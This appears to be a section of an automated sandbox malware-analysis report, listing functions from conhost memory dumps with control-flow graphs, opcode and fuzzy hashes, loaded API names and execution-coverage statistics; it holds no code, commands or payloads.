                                                                                                                                                          control_flow_graph 308 7ff7c14e50f6-7ff7c14e5103 309 7ff7c14e5105-7ff7c14e510d 308->309 310 7ff7c14e510e-7ff7c14e51d7 308->310 309->310 314 7ff7c14e5243 310->314 315 7ff7c14e51d9-7ff7c14e51e2 310->315 317 7ff7c14e5245-7ff7c14e526a 314->317 315->314 316 7ff7c14e51e4-7ff7c14e51f0 315->316 318 7ff7c14e51f2-7ff7c14e5204 316->318 319 7ff7c14e5229-7ff7c14e5241 316->319 324 7ff7c14e52d6 317->324 325 7ff7c14e526c-7ff7c14e5275 317->325 320 7ff7c14e5206 318->320 321 7ff7c14e5208-7ff7c14e521b 318->321 319->317 320->321 321->321 323 7ff7c14e521d-7ff7c14e5225 321->323 323->319 326 7ff7c14e52d8-7ff7c14e5380 324->326 325->324 327 7ff7c14e5277-7ff7c14e5283 325->327 338 7ff7c14e5382-7ff7c14e538c 326->338 339 7ff7c14e53ee 326->339 328 7ff7c14e5285-7ff7c14e5297 327->328 329 7ff7c14e52bc-7ff7c14e52d4 327->329 331 7ff7c14e529b-7ff7c14e52ae 328->331 332 7ff7c14e5299 328->332 329->326 331->331 333 7ff7c14e52b0-7ff7c14e52b8 331->333 332->331 333->329 338->339 341 7ff7c14e538e-7ff7c14e539b 338->341 340 7ff7c14e53f0-7ff7c14e5419 339->340 348 7ff7c14e5483 340->348 349 7ff7c14e541b-7ff7c14e5426 340->349 342 7ff7c14e53d4-7ff7c14e53ec 341->342 343 7ff7c14e539d-7ff7c14e53af 341->343 342->340 344 7ff7c14e53b3-7ff7c14e53c6 343->344 345 7ff7c14e53b1 343->345 344->344 347 7ff7c14e53c8-7ff7c14e53d0 344->347 345->344 347->342 350 7ff7c14e5485-7ff7c14e5516 348->350 349->348 351 7ff7c14e5428-7ff7c14e5436 349->351 359 7ff7c14e551c-7ff7c14e552b 350->359 352 7ff7c14e546f-7ff7c14e5481 351->352 353 7ff7c14e5438-7ff7c14e544a 351->353 352->350 355 7ff7c14e544c 353->355 356 7ff7c14e544e-7ff7c14e5461 353->356 355->356 356->356 357 7ff7c14e5463-7ff7c14e546b 356->357 357->352 360 7ff7c14e5533-7ff7c14e5598 call 7ff7c14e55b4 359->360 361 7ff7c14e552d 359->361 368 7ff7c14e559f-7ff7c14e55b3 360->368 369 7ff7c14e559a 360->369 361->360 369->368
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7cccebe5d9a45fd8d438a67bfef48e723ffdeca9f5a85d14bf8d6c0bc8008782
                                                                                                                                                          • Instruction ID: fd5e344ba027b1edc4b9c6d84dee2bd27be856a76910309d582d91d558ac835f
                                                                                                                                                          • Opcode Fuzzy Hash: 7cccebe5d9a45fd8d438a67bfef48e723ffdeca9f5a85d14bf8d6c0bc8008782
                                                                                                                                                          • Instruction Fuzzy Hash: 70F1A630908A8D8FEBA8EF28C8557E9B7D1FF54311F44827EE84DC7295CB74A9458B81
                                                                                                                                                          Function 00007FF7C14E5EA2 Relevance: .5, Instructions: 456COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 370 7ff7c14e5ea2-7ff7c14e5eaf 371 7ff7c14e5eb1-7ff7c14e5eb9 370->371 372 7ff7c14e5eba-7ff7c14e5f87 370->372 371->372 376 7ff7c14e5ff3 372->376 377 7ff7c14e5f89-7ff7c14e5f92 372->377 379 7ff7c14e5ff5-7ff7c14e601a 376->379 377->376 378 7ff7c14e5f94-7ff7c14e5fa0 377->378 380 7ff7c14e5fa2-7ff7c14e5fb4 378->380 381 7ff7c14e5fd9-7ff7c14e5ff1 378->381 386 7ff7c14e6086 379->386 387 7ff7c14e601c-7ff7c14e6025 379->387 382 7ff7c14e5fb6 380->382 383 7ff7c14e5fb8-7ff7c14e5fcb 380->383 381->379 382->383 383->383 385 7ff7c14e5fcd-7ff7c14e5fd5 383->385 385->381 388 7ff7c14e6088-7ff7c14e60ad 386->388 387->386 389 7ff7c14e6027-7ff7c14e6033 387->389 396 7ff7c14e60af-7ff7c14e60b9 388->396 397 7ff7c14e611b 388->397 390 7ff7c14e6035-7ff7c14e6047 389->390 391 7ff7c14e606c-7ff7c14e6084 389->391 393 7ff7c14e604b-7ff7c14e605e 390->393 394 7ff7c14e6049 390->394 391->388 393->393 395 7ff7c14e6060-7ff7c14e6068 393->395 394->393 395->391 396->397 398 7ff7c14e60bb-7ff7c14e60c8 396->398 399 7ff7c14e611d-7ff7c14e614b 397->399 400 7ff7c14e6101-7ff7c14e6119 398->400 401 7ff7c14e60ca-7ff7c14e60dc 398->401 405 7ff7c14e61bb 399->405 406 7ff7c14e614d-7ff7c14e6158 399->406 400->399 403 7ff7c14e60e0-7ff7c14e60f3 401->403 404 7ff7c14e60de 401->404 403->403 407 7ff7c14e60f5-7ff7c14e60fd 403->407 404->403 409 7ff7c14e61bd-7ff7c14e6295 405->409 406->405 408 7ff7c14e615a-7ff7c14e6168 406->408 407->400 410 7ff7c14e61a1-7ff7c14e61b9 408->410 411 7ff7c14e616a-7ff7c14e617c 408->411 419 7ff7c14e629b-7ff7c14e62aa 409->419 410->409 412 7ff7c14e6180-7ff7c14e6193 411->412 413 7ff7c14e617e 411->413 412->412 415 7ff7c14e6195-7ff7c14e619d 412->415 413->412 415->410 420 7ff7c14e62b2-7ff7c14e6314 call 7ff7c14e6330 419->420 421 7ff7c14e62ac 419->421 428 7ff7c14e6316 420->428 429 7ff7c14e631b-7ff7c14e632f 420->429 421->420 428->429
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c20420866e1f796e335a75e46ebe0eb54f3f79249dabf43f878eb56f013242bb
                                                                                                                                                          • Instruction ID: 75708384a9401136f8882cf93d9281b04617483668c09c7cc701c3bb32f55cb7
                                                                                                                                                          • Opcode Fuzzy Hash: c20420866e1f796e335a75e46ebe0eb54f3f79249dabf43f878eb56f013242bb
                                                                                                                                                          • Instruction Fuzzy Hash: 10E1A530908A4D8FEBA9EF28C8557E9B7E1FF54310F44827ED84DC7291CE74A9458B81
                                                                                                                                                          Function 0000021E7B55DEB2 Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021E7B340000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_21e7b340000_conhost.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ArrayCreateDestroyInstanceSafe
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3902440814-0
                                                                                                                                                          • Opcode ID: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                                                                                                          • Instruction ID: d433f0286607cde1e13e5e32b8d04a89c3be4590db7bfc6b496e00f0c6c7e045
                                                                                                                                                          • Opcode Fuzzy Hash: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                                                                                                          • Instruction Fuzzy Hash: 09816431218B088FDB68DF28D888BD7B7E6FFA5301F014A6DD89BC7191EA31E5458B51
                                                                                                                                                          Function 00007FF7C14E18CD Relevance: 2.8, Strings: 2, Instructions: 312COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: C_H$`/z
                                                                                                                                                          • API String ID: 0-812352719
                                                                                                                                                          • Opcode ID: ffa688a060170df360d23dfb03a88e69e8c6e640ec7794a764fdeccfd2e77701
                                                                                                                                                          • Instruction ID: 271ca8e14122191a2437cd73c9703e3771fd333e4b889033e72264fc4fbb1311
                                                                                                                                                          • Opcode Fuzzy Hash: ffa688a060170df360d23dfb03a88e69e8c6e640ec7794a764fdeccfd2e77701
                                                                                                                                                          • Instruction Fuzzy Hash: 8A815971B0D9C59FE756BB7C48691B9FBE0EF56720B8844FAC08AC7293CD58A902C311
                                                                                                                                                          Function 00007FF7C14E19A5 Relevance: 2.7, Strings: 2, Instructions: 193COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: C_H$`/z
                                                                                                                                                          • API String ID: 0-812352719
                                                                                                                                                          • Opcode ID: 0605839cdce2a61d8f555131ce764d015bed9a6ac7834f77d2b3aa2c53cc6860
                                                                                                                                                          • Instruction ID: f429b5ef15cdfedba77d6bf9034898ad9c45c63417be3f604f102d22c0ca366f
                                                                                                                                                          • Opcode Fuzzy Hash: 0605839cdce2a61d8f555131ce764d015bed9a6ac7834f77d2b3aa2c53cc6860
                                                                                                                                                          • Instruction Fuzzy Hash: 25511671B099894FE396FB7C4899279FBD1EF5A61078845FDD04AC72A2DD58A9028301
                                                                                                                                                          Function 0000021E7B55D3BA Relevance: 1.6, APIs: 1, Instructions: 125libraryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 244 21e7b55d3ba-21e7b55d3dd LoadLibraryA 245 21e7b55d3df-21e7b55d3e4 244->245 246 21e7b55d3e9-21e7b55d3fc 244->246 247 21e7b55d4c0-21e7b55d4d0 245->247 249 21e7b55d402-21e7b55d413 246->249 250 21e7b55d4be 246->250 249->250 251 21e7b55d419-21e7b55d431 249->251 250->247 251->250 253 21e7b55d437-21e7b55d46b call 21e7b55f85e 251->253 253->250 258 21e7b55d46d-21e7b55d47e 253->258 258->250 259 21e7b55d480-21e7b55d497 258->259 259->250 261 21e7b55d499-21e7b55d4b9 call 21e7b55f85e 259->261 261->245
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021E7B340000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_21e7b340000_conhost.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                                                                                                          • Instruction ID: f10d360651732e249677b5e8dac237642a64e3347f95cf247477c71035fc8a12
                                                                                                                                                          • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                                                                                                          • Instruction Fuzzy Hash: 3131743230CA088BFF54BA589C596AAB3D7EBE4311F011169EC4BC31C6D974ED4647C1
                                                                                                                                                          Function 0000021E7B55D2AF Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 265 21e7b55d2af-21e7b55d2c5 LoadLibraryA 266 21e7b55d2d1-21e7b55d2e4 265->266 267 21e7b55d2c7-21e7b55d2cc 265->267 270 21e7b55d2ea-21e7b55d2fb 266->270 271 21e7b55d3a6 266->271 268 21e7b55d3a8-21e7b55d3b8 267->268 270->271 272 21e7b55d301-21e7b55d319 270->272 271->268 272->271 274 21e7b55d31f-21e7b55d353 call 21e7b55f85e 272->274 274->271 279 21e7b55d355-21e7b55d366 274->279 279->271 280 21e7b55d368-21e7b55d37f 279->280 280->271 282 21e7b55d381-21e7b55d3a1 call 21e7b55f85e 280->282 282->267
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021E7B340000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_21e7b340000_conhost.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                                                                                                                          • Instruction ID: 4f2b4ab163533bc30425782d10dfe3c1e4cf0d6d09df0c31d3d44dd164bd6394
                                                                                                                                                          • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                                                                                                                          • Instruction Fuzzy Hash: DD315032308A084BEF64FA589C5969AB3D7EBE8321F0102699C5BC72C9DE74DD468781
                                                                                                                                                          Function 0000021E7B55D2A2 Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 286 21e7b55d2a2-21e7b55d2c5 LoadLibraryA 288 21e7b55d2d1-21e7b55d2e4 286->288 289 21e7b55d2c7-21e7b55d2cc 286->289 292 21e7b55d2ea-21e7b55d2fb 288->292 293 21e7b55d3a6 288->293 290 21e7b55d3a8-21e7b55d3b8 289->290 292->293 294 21e7b55d301-21e7b55d319 292->294 293->290 294->293 296 21e7b55d31f-21e7b55d353 call 21e7b55f85e 294->296 296->293 301 21e7b55d355-21e7b55d366 296->301 301->293 302 21e7b55d368-21e7b55d37f 301->302 302->293 304 21e7b55d381-21e7b55d3a1 call 21e7b55f85e 302->304 304->289
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021E7B340000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_21e7b340000_conhost.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                                                                                                                          • Instruction ID: 17d3826ecc73368d808190cc0f09ef7c2122cc843a2e0d464871bee1817a7987
                                                                                                                                                          • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                                                                                                                          • Instruction Fuzzy Hash: 42E0D83120CA0D1FFB68E59DDC4A7F666D8DBA5272F00006EE949C2181E055D8924391
                                                                                                                                                          Function 00007FF7C14E0120 Relevance: .2, Instructions: 213COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 492 7ff7c14e0120-7ff7c14e12d1 500 7ff7c14e12d3-7ff7c14e12d4 492->500 501 7ff7c14e12db-7ff7c14e1341 492->501 500->501 508 7ff7c14e1343-7ff7c14e1346 501->508 509 7ff7c14e1397-7ff7c14e13e2 501->509 511 7ff7c14e1350-7ff7c14e1395 508->511 517 7ff7c14e13e9-7ff7c14e141e 509->517 511->517
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 25da1aa04ab5727179b3b2d1831e77843421215692aa40101df9865b9d7de8e3
                                                                                                                                                          • Instruction ID: 0d01fc6f68b1608566ab0ad2364fa8307efb0d5016093eda65f8bd6061bfb0f3
                                                                                                                                                          • Opcode Fuzzy Hash: 25da1aa04ab5727179b3b2d1831e77843421215692aa40101df9865b9d7de8e3
                                                                                                                                                          • Instruction Fuzzy Hash: 11510760A1CA854FE744FB7C44692BEBBD1EF5D760F4406BDE08EC7293CD28A8028345
                                                                                                                                                          Function 00007FF7C14E1211 Relevance: .2, Instructions: 191COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fa303efdbc59a9154b35b0b39ada17fbc735629aad42fa9fac50a79b828046ad
                                                                                                                                                          • Instruction ID: d47ab2a87398f4ab96d46184f92b5e56da4d6fa8ef4d8e22f10432322c50c392
                                                                                                                                                          • Opcode Fuzzy Hash: fa303efdbc59a9154b35b0b39ada17fbc735629aad42fa9fac50a79b828046ad
                                                                                                                                                          • Instruction Fuzzy Hash: E1510960A0CAC55FE745EB7C44696B9BBD1EF5E760F4406BDD08EC7293CD68A8028351
                                                                                                                                                          Function 00007FF7C14E1092 Relevance: .2, Instructions: 173COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 551 7ff7c14e1092-7ff7c14e1099 552 7ff7c14e10a2-7ff7c14e10b3 551->552 553 7ff7c14e109b 551->553 554 7ff7c14e10b5 552->554 555 7ff7c14e10bc-7ff7c14e10cb 552->555 553->552 554->555 556 7ff7c14e10d4-7ff7c14e10e3 555->556 557 7ff7c14e10cd 555->557 558 7ff7c14e10e5 556->558 559 7ff7c14e10ec-7ff7c14e10fb 556->559 557->556 558->559 560 7ff7c14e1104-7ff7c14e1113 559->560 561 7ff7c14e10fd 559->561 562 7ff7c14e1115 560->562 563 7ff7c14e111c-7ff7c14e112b 560->563 561->560 562->563 564 7ff7c14e1134-7ff7c14e1143 563->564 565 7ff7c14e112d 563->565 566 7ff7c14e1145 564->566 567 7ff7c14e114c-7ff7c14e115b 564->567 565->564 566->567 568 7ff7c14e1164-7ff7c14e1173 567->568 569 7ff7c14e115d 567->569 570 7ff7c14e1175 568->570 571 7ff7c14e117c-7ff7c14e118b 568->571 569->568 570->571 572 7ff7c14e1194-7ff7c14e11a3 571->572 573 7ff7c14e118d 571->573 574 7ff7c14e11a5 572->574 575 7ff7c14e11ac-7ff7c14e11bb 572->575 573->572 574->575 576 7ff7c14e11c4-7ff7c14e11e2 575->576 577 7ff7c14e11bd 575->577 580 7ff7c14e11e9-7ff7c14e11ee call 7ff7c14e0120 576->580 577->576 582 7ff7c14e11f3-7ff7c14e120a 580->582
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 47205286c48692424956a70fb445376b8554d46509d3647aeecfdb326f525316
                                                                                                                                                          • Instruction ID: b19b13c6175829da8c7073eab8267e127e813a830899d09baf7c27fa35f0b4b3
                                                                                                                                                          • Opcode Fuzzy Hash: 47205286c48692424956a70fb445376b8554d46509d3647aeecfdb326f525316
                                                                                                                                                          • Instruction Fuzzy Hash: C251A22098E3C15FE307A3349C65A95BFA16F83764F5D81EAF0C5CE4B3C6AA4585C722
                                                                                                                                                          Function 00007FF7C14E07EC Relevance: .1, Instructions: 92COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2ebb85ef3d92fd540be230d9a13673a7a1ee3215178b173db60383ea0d0b6db5
                                                                                                                                                          • Instruction ID: d532858fb535ada51ba602a92d509a5172091f20f1f1cf633afce208fc7854d5
                                                                                                                                                          • Opcode Fuzzy Hash: 2ebb85ef3d92fd540be230d9a13673a7a1ee3215178b173db60383ea0d0b6db5
                                                                                                                                                          • Instruction Fuzzy Hash: 7521D620B1D9C91FE786E7784429BBABFE1DF5A241B4485BDC0CEC76A3CC49A9468340
                                                                                                                                                          Function 00007FF7C14E0430 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 600 7ff7c14e0430-7ff7c14e047d 605 7ff7c14e047f-7ff7c14e04b0 600->605 606 7ff7c14e04ba-7ff7c14e04d8 605->606
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 99fb05300054927506d4670d506b20679306d6034a16d96f63f67ab66861e55f
                                                                                                                                                          • Instruction ID: c4d4d72080007685bd7a0bf9bd463f554b12836b684d077c3cde4b21845cff21
                                                                                                                                                          • Opcode Fuzzy Hash: 99fb05300054927506d4670d506b20679306d6034a16d96f63f67ab66861e55f
                                                                                                                                                          • Instruction Fuzzy Hash: AE218E6190E6C91FE3269A342C256F6BFA0AF17210F4845FFD0C8871D7D8585D098763
                                                                                                                                                          Function 00007FF7C14E04EF Relevance: .0, Instructions: 38COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b2cc6138563e84801ba5dc6141bcdfdac84aa01f2ba6a2ed21c50ef24bd95d86
                                                                                                                                                          • Instruction ID: 21b367143960ca03a63eaf6a07ef7432498e2b399907e5379a50ec0537a1e346
                                                                                                                                                          • Opcode Fuzzy Hash: b2cc6138563e84801ba5dc6141bcdfdac84aa01f2ba6a2ed21c50ef24bd95d86
                                                                                                                                                          • Instruction Fuzzy Hash: 8EF0C230A0E6CD6FD713AB7448683E57FE0DF1A200F4449FEC0C9D76A1C8196A5A8712
                                                                                                                                                          Function 00007FF7C14E0794 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f266a1627395a20c4ed42b27e46c3a52d3f99a0be9d70c774b444c5dd021813e
                                                                                                                                                          • Instruction ID: b3169bf80605f88769a1cbacbf5ff622a104c84952cb67e926e7ec60da8877e7
                                                                                                                                                          • Opcode Fuzzy Hash: f266a1627395a20c4ed42b27e46c3a52d3f99a0be9d70c774b444c5dd021813e
                                                                                                                                                          • Instruction Fuzzy Hash: 3AF0BB2060E5C82FD347EBB44469665BFD1CF06151B8885EDD0C5D75B2C81A9A56C314
                                                                                                                                                          Function 00007FF7C14E11D0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 35e2fe2a41aa6820833d9492312c05b24704ec7d56bda1dc6a91bf6c35fed18e
                                                                                                                                                          • Instruction ID: 49739c1aaa873272d71775f93aa472756d4ee8100d55d0764a0336f5ed39ff89
                                                                                                                                                          • Opcode Fuzzy Hash: 35e2fe2a41aa6820833d9492312c05b24704ec7d56bda1dc6a91bf6c35fed18e
                                                                                                                                                          • Instruction Fuzzy Hash: 59E02621B18C0D0F9A98F73C4445A69E2C2EFCC32074106B6E40CC3256DC28EC4183C0
                                                                                                                                                          Function 00007FF7C14E6657 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4bf64cfe57d6468be794dbde03461101c8b8cb4933a4d5791a2db918d700d53b
                                                                                                                                                          • Instruction ID: 693896d65a26b81b3b0c2ddcdb051fbfcbfde541cf309b400123efd63bfd5668
                                                                                                                                                          • Opcode Fuzzy Hash: 4bf64cfe57d6468be794dbde03461101c8b8cb4933a4d5791a2db918d700d53b
                                                                                                                                                          • Instruction Fuzzy Hash: CBE0D8A1F1C8068FE358673C18152A5F791EF8A7A4F9082B9C04DC7182ED145C064351

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:29.5%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:15
                                                                                                                                                          Total number of Limit Nodes:0
